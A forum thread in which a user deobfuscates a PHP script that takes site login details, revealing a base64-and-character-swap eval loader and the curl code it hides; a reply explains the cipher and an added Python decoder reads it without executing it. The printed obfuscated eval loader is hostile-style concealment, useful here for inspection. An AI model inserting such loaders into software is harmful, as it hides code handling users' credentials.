Can Someone Decode This?


dzhax

I found a script I want to use, but it entails entering account information for a site. So obviously I am going to look through it and make sure it's not a phishing attempt on my info. While I was doing this I found this $_X=''; and what appears to be a base64 encoded string. So I base64 decoded it and it doesn't look right still...

The code in the script:

if(isset($_GET['e'])) {	$_F=__FILE__;	$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));	$result = sendInvite($_GET['e']);

My attempt to decode:

<? echo base64_decode("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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="); ?>

My Result:

?> "2n", "h1ndl5" => L_LOGIN, "p1ssw2rd" => L_PASSWORD, ); $c22k45_f4l5_p1th = "c22k45.txt"; $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, tr35); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "S4gn23t") == FALSE){ r5t3rn "d2wn"; } $p2st3rl = "http://www.l2ck5rz.c2m/4nv4t1t42n/s5nd_5m14l_4nv4t5s"; $r5f5rr5r = "http://www.l2ck5rz.c2m/c2nn5ct"; $p2st4t = 1rr1y("5m14ls" => "$5m14ls", "m5ss1g5" => L_MESSAGE ); $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, 6); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "s3cc5ss") == TRUE){ $myF4l5 = "c23nt.txt"; $fh = f2p5n($myF4l5, 'w') 2r d45("C1n't 2p5n c23nt.txt"); $c23nt++; $str4ngD1t1 = $c23nt; fwr4t5($fh, $str4ngD1t1) 2r d45("C1n't 3pd1t5 c23nt.txt"); fcl2s5($fh); r5t3rn "s5nt"; } 5ls5 { r5t3rn "1lr51dy"; } } } 
?>¯jVÚ±î¸uç(uâEõƒÖ&6ScEöFV6öFR‚Eõ‚“²Eõƒ×7G'G"‚Eõ‚Âs#3CSf÷V–RrÂv÷V–S#3CSbr“²Eõ#ÖW&Vu÷&WÆ6R‚uõôd”ÄUõòrÂ"r"âEôbâ"r"ÂEõ‚“¶Wf‚Eõ"“²Eõ#Ó²EõƒÓ°

The majority of it is readable but the very end and what appears to be random number replacement... I didn't even see anywhere in the script that is decoding... Any help appreciated.

EDIT: On second thought, after looking at my post just now I noticed a decode at the end of that long line... let's see what that says :)

OK, found out that that last line of gibberish was a decode statement tacked on the end of the line.

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

Edited by dzhax

What exactly are you looking for help with?

It looks like just character replacement. You can see here:

p1ssw2rd

that 1=a and 2=o. So you could substitute that in here:

c22k45_f4l5_p1th

to get:

cook45_f4l5_path

I'm going to guess that 4=i and 5=e, to give "cookie_file_path".

I know that this is curl_init:

$ch = c3rl_4n4t();

So then 3=u.

So apparently they replaced the vowels with 1-5. You can go through that code and replace everything yourself if you want to see it. There's a second eval on the bottom of what you decoded, make sure you echo that also.
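Added example (not part of either post and not the script author's code): a static decoder in Python that reads the two strtr() tables out of the loader stub posted above and applies them without ever calling eval. The helper names, the placeholder file path and the sample line in `__main__` are constructed for illustration; the obfuscated fragments are copied from the "My Result" output.

```python
import base64
import re

# Loader stub exactly as posted: the argument of eval(base64_decode('...')).
STUB_B64 = (
    "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3Vp"
    "ZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCIn"
    "Ii4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="
)


def strtr_tables(stub_b64=STUB_B64):
    """Decode the stub as text and return (stub, from_chars, to_chars)."""
    stub = base64.b64decode(stub_b64).decode("ascii")
    m = re.search(r"strtr\(\$_X,'([^']*)','([^']*)'\)", stub)
    if m is None:
        raise ValueError("stub has no strtr($_X, '...', '...') call")
    return stub, m.group(1), m.group(2)


def php_strtr(data, src, dst):
    """Byte-for-byte equivalent of PHP's three-argument strtr()."""
    n = min(len(src), len(dst))  # PHP ignores the tail of the longer table
    return data.translate(bytes.maketrans(src[:n].encode(), dst[:n].encode()))


def reveal(payload_b64, file_path="/placeholder/script.php"):
    """Do what the stub does (base64, strtr, __FILE__ swap) but return the
    source as a string instead of passing it to eval()."""
    _, src, dst = strtr_tables()
    text = php_strtr(base64.b64decode(payload_b64), src, dst).decode("latin-1")
    return text.replace("__FILE__", "'" + file_path + "'")


if __name__ == "__main__":
    stub, src, dst = strtr_tables()
    print(stub)
    # Fragments copied from the "My Result" output in the first post.
    for frag in (b"c22k45_f4l5_p1th", b"c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0);"):
        print(frag.decode(), "->", php_strtr(frag, src, dst).decode())
    # Constructed payload: encode a known line with the inverse table, then
    # confirm reveal() recovers it.
    plain = b"$f = __FILE__; curl_setopt($ch, CURLOPT_POST, true);"
    print(reveal(base64.b64encode(php_strtr(plain, dst, src))))
```

The table in the stub remaps digits and the vowels themselves as well, so in the posted output `i0` is `50` and `6` is `1`.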
